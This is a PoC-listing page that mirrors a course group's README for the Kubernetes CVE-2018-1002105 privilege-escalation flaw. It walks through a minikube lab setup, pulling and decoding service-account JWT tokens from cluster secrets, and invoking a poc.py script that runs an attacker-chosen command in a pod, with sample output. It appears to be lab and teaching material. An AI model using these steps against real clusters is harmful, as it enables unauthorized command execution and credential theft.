CVE-2018-1002105 PoC — Google Kubernetes 权限许可和访问控制漏洞

Source

https://github.com/sh-ubh/CVE-2018-1002105

Associated Vulnerability

Title:Google Kubernetes 权限许可和访问控制漏洞 (CVE-2018-1002105)
Description:In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.

Readme

# CMPT733-Group11(0x90)

### CVE-2018-1002105
__Members__: Abhishek Rungta, Shubham Saini, Siddhant Sood

# Environment Setup

* A linux VM (Such as Ubuntu 20.04)
* Minikube for local deploymnet of kubernetes
* Any of these older versions(1.0.x— 1.9.x, 1.10.0—1.10.10,1.11.0—1.11.4,1.12.0—1.12.2)


# Run the exploit

We have provided a virtual box image (.ova file)
Download it and create a VM from it.
The ova provided is pre configured with docker v18.09 and minikube v1.9.0

[OVA link](https://drive.google.com/file/d/1sK7vb8ijzqo971J5ofyScwQBvgaOGogm/view?usp=sharing)
#### Build the kubernetes cluster

As our virtual image already has minkube and the required kubernetes versions just run the following command to start minikube
~~~
minikube start --kubernetes-version=v1.12.2
~~~


#### Create new user, namespace and assign role
Create a new user and a namespace and assign RBAC role to the user created using the followig command.

~~~
kubectl apply -f fixing_policy.yml
~~~


#### Remove access to conntract

~~~
kubectl edit configmaps kube-proxy --namespace=kube-system
~~~

Change the set maxPerCore to 0



#### Get the JWT token 

First run the following command to get all the jwt tokens stored in the system

~~~
kubectl get secrets -A
~~~

To get the secret of the particular user created run the following command:
~~~
kubectl -n [namespace] get secrets [user-token] -o json
~~~

Then base64 decode it.

~~~
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN
~~~

#### Get the IP address and port No.

~~~
kubectl cluster-info
~~~

#### To deploy the pod

~~~
kubectl run --image=nginx:alpine securenginx -n poc
~~~


#### Run the POC

Specify all the required arguments:\
-t for the target> ip:port (required)\
-j for the JWT token of the user (required)\
-p for pod (required)\
-n for the namespace\
-m for the method (required)\
-c for the container\
-x for the attacker command

#### Test case

Input
~~~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
~~~

~~~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 
~~~

Output
~~~
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}
~~~



# Video Demo

Demo video [link](
https://youtu.be/NKioO9UwwAw
 )

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →